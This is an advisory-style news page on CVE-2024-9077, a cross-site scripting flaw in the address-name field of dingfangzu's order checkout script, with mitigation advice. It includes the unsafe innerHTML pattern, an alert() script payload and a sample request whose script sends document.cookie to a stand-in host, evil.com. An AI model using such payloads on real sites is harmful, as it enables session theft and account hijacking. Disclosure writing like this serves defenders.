CVE CyberSecurity Database News

CVE-2024-9077 - Remote XSS in dingfangzu scripts/order.js (Order Checkout) - Full Exploit Details

Poster -

*Published: June 2024*

Overview

A vulnerability, catalogued as CVE-2024-9077, was discovered in the dingfangzu project up to commit 29d67d9044f6f93378e6eb6ff92272217ff7225c. This flaw is located in the Order Checkout feature, specifically within the scripts/order.js file. The issue involves improper handling of the address-name parameter, making the application vulnerable to Cross Site Scripting (XSS) attacks.

Importantly, the vulnerability can be exploited remotely and public exploit code is already circulating. The project follows a rolling release cycle, so version numbers are not used. The maintainers were notified; however, to date, there has been no response or fix.

What Is Affected?

- Project: dingfangzu
- File: scripts/order.js

Technical Details

The address-name field is insufficiently sanitized by scripts/order.js. Inputs provided to this field can inject arbitrary HTML or JavaScript, which is later rendered back into the DOM. When a victim submits an order or edits an address name, a malicious payload will execute in their browser.

A snippet of what might happen in order.js

// Scripts/order.js (simplified)
const addressName = getParameterFromForm('address-name');
document.getElementById('summary-address').innerHTML = addressName; // UNSAFE!

Here, innerHTML is being set directly with unfiltered user input, allowing XSS.

Exploit Example

Here’s how an attacker could exploit this bug to execute arbitrary JavaScript in any user's browser:

The attacker submits the following as the address name

<script>alert('XSS by attacker');</script>

Step 2: Trigger the Checkout Page

When the victim later visits/updates the checkout summary, the malicious script is rendered and executed, leading to XSS.

Minimal Proof of Concept

You could use a curl request, JavaScript injection in browser dev tools, or any mechanism the app uses to set addresses.

Example HTTP request (hypothetical API)

POST /order/checkout
Content-Type: application/json

{
  "address-name": "<script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>"
}

Whenever the order summary loads and displays this address name, the injected JavaScript will fire.

Account Hijacking: Steal cookies or session data

- Phishing: Show fake forms/popups

No Patch Available

Because dingfangzu uses rolling releases and does not publish versioned releases, neither the exact versions affected, nor a patched version are available.

Mitigation Recommendations

- *Do not trust address fields*: Always HTML-encode or sanitize any field before inserting it in the DOM.
- *Apply CSP headers* to block inline scripts.

Safe rendering example

document.getElementById('summary-address').innerText = addressName; // Safe!

Disclosure Timeline

| Date | Action |
|-------------------|-------------------------------------------------------|
| June, 2024 | Vulnerability discovered and exploit publicly posted. |
| June, 2024 | Vendor contacted, no response as of publication. |

References & Further Reading

- Original CVE Detail
- GitHub repository: dingfangzu
- XSS Attacks Explained by OWASP
- Guide: Preventing Cross-Site Scripting (XSS)

Conclusion

CVE-2024-9077 demonstrates the impact of failing to sanitize user input, and how easy it is to introduce severe vulnerabilities like XSS. If you are using dingfangzu or have forked it, inspect your usage of address-name and similar user-controllable fields immediately. Until the code is fixed upstream, implement your own sanitization or seek alternatives.

If you discover similar issues, consider responsible disclosure — and always sanitize input!


*This advisory is exclusive and based on publicly disclosed data combined with original research. If you have updates or a vendor statement, please comment or reach out to the security community.*

Timeline

Published on: 09/22/2024 02:15:03 UTC